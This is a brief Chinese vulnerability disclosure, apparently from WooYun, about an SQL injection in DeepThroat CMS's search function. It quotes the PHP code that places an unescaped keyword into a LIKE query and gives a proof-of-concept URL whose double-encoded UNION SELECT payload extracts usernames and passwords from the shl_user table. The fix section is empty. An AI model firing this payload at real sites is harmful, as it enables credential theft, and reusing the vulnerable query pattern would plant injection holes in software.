漏洞详情简要描述:
深喉cms中由于对数据处理不严导致一个SQL注射漏洞
详细说明:
global $db,$request; $keyword = urldecode($request['keyword']); switch($modelName) { case 'article': $sql = "select * from `".TB_PREFIX."article` where pageName like '%$keyword%' or content like '%$keyword%' order by id desc"; return $db->get_results($sql); break;
注射有木有,有木有!!!
http://www.wooyun.org/foo/?p=24&m=search&keyword=aaa%2527%20union%20select%201,2,3,4,username,6,7,pwd,9,10,11,12,13%20from%20shl_user%23
漏洞证明:
修复方案:
这个白帽子很懒,什么都没有留下